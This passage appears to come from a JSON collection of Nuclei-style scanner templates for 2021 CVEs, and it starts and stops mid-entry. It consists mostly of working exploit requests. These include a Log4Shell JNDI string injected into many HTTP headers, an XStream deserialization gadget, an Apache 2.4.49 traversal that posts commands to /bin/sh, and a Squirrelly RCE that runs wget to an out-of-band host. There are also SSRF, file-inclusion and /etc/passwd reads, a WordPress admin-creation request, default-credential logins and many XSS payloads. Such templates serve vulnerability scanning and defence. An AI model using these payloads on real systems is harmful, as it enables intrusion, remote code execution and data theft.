<clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>hash</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>int</type>\n                              <field reference='../../../../../val_-getter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                        </propertySetters>\n                        <propertyGetters>\n                          <entry>\n                            <string>serialPersistentFields</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>[Ljava.io.ObjectStreamField;</type>\n                              <field reference='../../../../propertySetters/entry/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>CASE_INSENSITIVE_ORDER</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>java.util.Comparator</type>\n                              <field reference='../../../../propertySetters/entry[2]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>serialVersionUID</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>long</type>\n                              <field reference='../../../../propertySetters/entry[3]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>value</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>[C</type>\n                              <field reference='../../../../propertySetters/entry[4]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>hash</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter reference='../../../../val_-getter'/>\n                          </entry>\n                        </propertyGetters>\n                        <elementLocalNameCollision>false</elementLocalNameCollision>\n                        <contentClass>java.lang.String</contentClass>\n                        <elementDeclaredTypes/>\n                      </outer-class>\n                    </com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>\n                  </accessors>\n                  <wrapper>java.lang.Object</wrapper>\n                  <bindingContext class='com.sun.xml.internal.ws.db.glassfish.JAXBRIContextWrapper'/>\n                  <dynamicWrapper>false</dynamicWrapper>\n                </bodyBuilder>\n                <isOneWay>false</isOneWay>\n              </com.sun.xml.internal.ws.client.sei.StubHandler>\n            </entry>\n          </stubHandlers>\n          <clientConfig>false</clientConfig>\n        </databinding>\n        <methodHandlers>\n          <entry>\n            <method reference='../../../databinding/stubHandlers/entry/method'/>\n            <com.sun.xml.internal.ws.client.sei.SyncMethodHandler>\n              <owner reference='../../../..'/>\n              <method reference='../../../../databinding/stubHandlers/entry/method'/>\n              <isVoid>false</isVoid>\n              <isOneway>false</isOneway>\n            </com.sun.xml.internal.ws.client.sei.SyncMethodHandler>\n          </entry>\n        </methodHandlers>\n      </handler>\n    </dynamic-proxy>\n    <string>ldap://{{interactsh-url}}/#evil</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-24335","info":{"name":"WordPress Car Repair Services & Auto Mechanic Theme <4.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27905","info":{"name":"Apache Solr <=8.8.1 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n","GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://interact.sh HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n"],"matchers":[{"type":"word","part":"body","words":["<str name=\"status\">OK</str>"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2021-21816","info":{"name":"D-Link DIR-3040 1.13B03 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/messages"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["syslog:","admin","/etc_ro/lighttpd/www"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37704","info":{"name":"phpfastcache - phpinfo Resource Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php","{{BaseURL}}/vendor/phpfastcache/phpfastcache/examples/phpinfo.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2021-29441","info":{"name":"Nacos <1.4.1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nUser-Agent: Nacos-Server\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 403","status_code_2 == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body_1, 'Forbidden')","body_2 == 'true'"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2021-21801","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44228","info":{"name":"Apache Log4j2 Remote Code Injection","severity":"critical"},"requests":[{"raw":["GET /?x=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1\nHost: {{Hostname}}\n","GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}\nAccept-Encoding: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptencoding.{{interactsh-url}}}\nAccept-Language: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptlanguage.{{interactsh-url}}}\nAccess-Control-Request-Headers: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}\nAccess-Control-Request-Method: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}\nAuthentication: Basic ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbasic.{{interactsh-url}}}\nAuthentication: Bearer ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbearer.{{interactsh-url}}}\nCookie: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookievalue.{{interactsh-url}}}\nLocation: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.location.{{interactsh-url}}}\nOrigin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.origin.{{interactsh-url}}}\nReferer: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.referer.{{interactsh-url}}}\nUpgrade-Insecure-Requests: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}\nUser-Agent: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.useragent.{{interactsh-url}}}\nX-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}}\nX-CSRF-Token: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xcsrftoken.{{interactsh-url}}}\nX-Druid-Comment: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xdruidcomment.{{interactsh-url}}}\nX-Forwarded-For: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xforwardedfor.{{interactsh-url}}}\nX-Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xorigin.{{interactsh-url}}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"regex","part":"interactsh_request","regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]}],"extractors":[{"type":"kval","kval":["interactsh_ip"]},{"type":"regex","group":2,"regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"},{"type":"regex","group":1,"regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-21234","info":{"name":"Spring Boot Actuator Logview Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../","{{BaseURL}}/log/view?filename=/windows/win.ini&base=../../../../../../../../../../","{{BaseURL}}/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../","{{BaseURL}}/log/view?filename=/etc/passwd&base=../../../../../../../../../../"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-38702","info":{"name":"Cyberoam NetGenie Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44451","info":{"name":"Apache Superset <=1.3.2 - Default Login","severity":"medium"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf_token={{csrf_token}}&username={{username}}&password={{password}}\n","GET /dashboard/list/ HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"username":["admin"],"password":["admin"]},"attack":"pitchfork","cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["session"]},{"type":"word","part":"body_3","words":["DashboardFilterStateRestApi"]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["name=\"csrf_token\" type=\"hidden\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-25052","info":{"name":"WordPress Button Generator <2.3.3 - Remote File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=wow-company&tab=http://{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46424","info":{"name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete","severity":"critical"},"requests":[{"raw":["GET /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n","DELETE /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n","GET /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 200 && status_code_2 == 204 && status_code_3 == 404"]}]}]},{"id":"CVE-2021-32819","info":{"name":"Nodejs Squirrelly - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Wget"]}]}]},{"id":"CVE-2021-41773","info":{"name":"Apache 2.4.49 - Path Traversal and Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\necho Content-Type: text/plain; echo; {{cmd}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","name":"RCE","words":["CVE-2021-41773-POC"]},{"type":"regex","name":"LFI","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-46387","info":{"name":"Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Forms/rpAuth_1?id=</form><iMg%20src=x%20onerror=\"prompt(document.domain)\"><form>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<iMg src=x onerror=\"prompt(document.domain)\"><form>","Entry Error"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43734","info":{"name":"kkFileview v4.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/getCorsFile?urlPath=file:///etc/passwd","{{BaseURL}}/getCorsFile?urlPath=file:///c://windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26723","info":{"name":"Jenzabar 9.2x-9.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27330","info":{"name":"Triconsole Datepicker Calendar <3.77 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/calendar/calendar_form.php/\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","<title>TriConsole.com - PHP Calendar Date Picker</title>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24291","info":{"name":"WordPress Photo Gallery by 10Web <1.5.69 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1\"%20onmouseover=alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["onmouseover=alert(document.domain)//","wp-content/uploads/photo-gallery"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39501","info":{"name":"EyouCMS 1.5.4 Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2021-46005","info":{"name":"Sourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nusername={{username}}&password={{password}}&login=\n","POST /admin/post-avehical.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarypWqYipqU21aYgccv\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"vehicletitle\"\n\nTest\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"brandname\"\n\n1\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"vehicalorcview\"\n\n</script><script>alert(document.domain)</script>\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"priceperday\"\n\n500\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"fueltype\"\n\nPetrol\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"modelyear\"\n\n2022\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"seatingcapacity\"\n\n5\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img1\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img2\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img3\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img4\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img5\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"submit\"\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv--\n","GET / HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22005","info":{"name":"VMware vCenter Server - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\ntest_data\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","status_code_2 == 201","contains(body_1, 'VMware vSphere')","content_length_2 == 0"],"condition":"and"}]}]},{"id":"CVE-2021-28150","info":{"name":"Hongdian H8922 3.0.5 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /backup2.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n","GET /backup2.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"word","part":"body","words":["CLI configuration saved from vty","service webadmin"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24436","info":{"name":"WordPress W3 Total Cache <2.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=w3tc_extensions&extension=\"%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, '><script>alert(document.domain)</script>&action=view')","contains(header_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2021-26702","info":{"name":"EPrints 3.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34621","info":{"name":"WordPress ProfilePress  3.0.0-3.1.3 - Admin User Creation Weakness","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_username\"\n\n{{randstr}}\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_email\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_password\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_password_present\"\n\ntrue\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_first_name\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_last_name\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"_wp_http_referer\"\n\n/wp/?page_id=18\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"pp_current_url\"\n\n{{BaseURL}}\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"wp_capabilities[administrator]\"\n\n1\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"signup_form_id\"\n\n1\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"signup_referrer_page\"\n\n\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"action\"\n\npp_ajax_signup\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"melange_id\"\n\n\n-----------------------------138742543134772812001999326589--\n","POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\nlog={{randstr}}@interact.sh&pwd={{randstr}}@interact.sh&wp-submit=Log+In\n","GET /wp-admin/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nConnection: close\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome to your WordPress Dashboard"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42063","info":{"name":"SAP Knowledge Warehouse <=7.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/SAPIrExtHelp/random/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<SVG ONLOAD=&#97&#108&#101&#114&#116(&#X64&#X6F&#X63&#X75&#X6D&#X65&#X6E&#X74&#X2E&#X64&#X6F&#X6D&#X61&#X69&#X6E)>","SAPIKS2"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41649","info":{"name":"PuneethReddyHC Online Shopping System homeaction.php SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/homeaction.php"],"body":"cat_id=4'&get_seleted_Category=1","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Warning: mysqli_num_rows() expects parameter 1 to be","xdebug-error xe-warning"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25120","info":{"name":"Easy Social Feed < 6.2.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'type' : '</script><script>alert(document.domain)</script>'"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43574","info":{"name":"Atmail 6.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/atmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/atmail/webmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>\" does not exist"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500,403],"condition":"or"}]}]},{"id":"CVE-2021-31682","info":{"name":"WebCTRL OEM <= 6.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>","common/lvl5"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26598","info":{"name":"ImpressCMS <1.4.3 - Incorrect Authorization","severity":"medium"},"requests":[{"raw":["GET /misc.php?action=showpopups&type=friend HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36\n","GET /include/findusers.php?token={{token}} HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["last_login","user_regdate","uname"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["REQUEST' value='(.*?)'","REQUEST\" value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2021-24940","info":{"name":"WordPress Persian Woocommerce <=5.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=persian-wc&s=xxxxx%22+accesskey%3DX+onclick%3Dalert%281%29+test%3D%22 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'accesskey=X onclick=alert(1) test=')","contains(body_2, 